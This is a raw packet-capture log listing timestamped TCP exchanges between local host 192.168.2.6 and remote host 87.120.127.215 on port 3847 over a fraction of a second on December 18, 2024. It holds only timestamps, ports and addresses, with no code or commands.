                                                                                                                                      Dec 18, 2024 19:28:06.466706038 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.466716051 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.466727018 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.466805935 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.466805935 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.467606068 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.467657089 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.467681885 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.469372988 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.469425917 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.469461918 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.471170902 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.471214056 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.471286058 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.472938061 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.472995043 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.473062038 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.474688053 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.474785089 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.474823952 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.476295948 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.476335049 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.476416111 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.478055000 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.478131056 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.478138924 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.479533911 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.479572058 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.479610920 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.481163979 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.481209040 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.481241941 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.482676983 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.482791901 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.482827902 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.484215975 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.484256029 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.484366894 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.485933065 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.485944033 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.485985994 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.487310886 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.487365007 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.487370014 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.488781929 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.488828897 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.488862038 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.490407944 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.490457058 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.490472078 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.491763115 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.491811991 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.491868019 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.493386030 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.493441105 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.493513107 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.494735003 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.494776011 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.494810104 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.496407032 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.496418953 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.496449947 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.497859955 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.497870922 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.497931957 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.499420881 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.499464035 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.499757051 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.500933886 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.501142025 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.501182079 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.502451897 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.502491951 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.502594948 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.503773928 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.503786087 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.503825903 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.505122900 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.505356073 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.505413055 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.506572008 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.506627083 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.506628036 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.508053064 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.508097887 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.508192062 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.509638071 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.509690046 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.509768963 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.511050940 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.511094093 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.511166096 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.512562990 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.512622118 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.512655973 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.514139891 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.514216900 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.514257908 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.515469074 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.515510082 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.515558958 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.516985893 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.517102003 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.517153025 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.518619061 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.518665075 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.518729925 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.519979954 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.520030975 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.520097971 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.521477938 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.521548986 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.521598101 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.522851944 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.522893906 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.522994041 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.524429083 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.524473906 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.524507999 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.525839090 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.525880098 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.525949955 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.527362108 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.527429104 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.527431011 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.528803110 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.528855085 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.528893948 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.530328989 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.530378103 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.530384064 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.531838894 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.531905890 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.531969070 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.533250093 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.533308029 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.533350945 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.534751892 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.534768105 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.534825087 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.646197081 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.646291971 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.646394968 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.646666050 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.646763086 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.646810055 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.648003101 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.648073912 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.648133993 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.648962975 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.649019003 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.649234056 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.649931908 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.650006056 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.650098085 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.651055098 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.651987076 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.652074099 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.656191111 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.656228065 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.656264067 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.656321049 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.656353951 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.656409979 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.657064915 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.657212973 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.657269001 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.658288002 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.658344030 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.658606052 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.659049034 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.659101009 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.659179926 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.660224915 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.660260916 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.660657883 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.661257982 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.661407948 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.661457062 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.662322044 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.662477016 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.662530899 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.663552046 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.663711071 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.664098978 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.664618015 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.664783001 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.664835930 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.665849924 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.665885925 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.666496038 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.667054892 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.667104959 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.667182922 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.667985916 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.668158054 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.668215036 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.669347048 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.669383049 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.669509888 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.670492887 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.670535088 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.670577049 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.671528101 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.671686888 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.671739101 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.672673941 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.672864914 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.673082113 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.673806906 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.674107075 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.674156904 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.675095081 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.675266981 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.675626993 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.676263094 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.676300049 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.676395893 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.677280903 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.677565098 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.678397894 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.678477049 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.678514004 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.678556919 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.679761887 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.679799080 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.679847956 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.680671930 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.680835009 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.680891037 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.682128906 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.682277918 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.682327032 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.683135033 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.683310032 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.683373928 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.684197903 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.684341908 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.684412956 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.685344934 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.685486078 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.685556889 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.686335087 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.686503887 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.686558962 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.687537909 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.687699080 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.687777042 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.688707113 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.688882113 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.688966036 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.689924002 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.689970016 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.690073013 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.691111088 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.691268921 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.691354990 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.692260981 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.692296982 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.692356110 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.692820072 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.692946911 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.692982912 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.693020105 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.693032980 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.693064928 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.695584059 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.695724010 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.696131945 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.696856976 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.696892977 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.697004080 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.698009014 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.698168039 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.698251963 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.699028969 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.699208975 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.699259043 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.700210094 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.700521946 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.700581074 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.701384068 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.701708078 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.701759100 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.702591896 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.702627897 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.702795029 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.703577042 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.703759909 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.703825951 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.704777956 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.704932928 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.705013990 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.706069946 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.706104994 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.706317902 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.706948042 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.707118988 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.707173109 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.708237886 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.800590038 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.837436914 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.837542057 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.837630987 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.838145018 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.838185072 CET38474985987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:06.838320017 CET498593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:06.839097023 CET38474985987.120.127.215192.168.2.6
